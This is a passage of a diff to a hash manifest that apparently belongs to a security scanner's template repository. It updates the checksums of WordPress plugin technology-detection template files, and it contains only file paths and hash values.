+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 -http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6b829502bedd78aae545f30777fe1f110f16a7ad -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 -http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 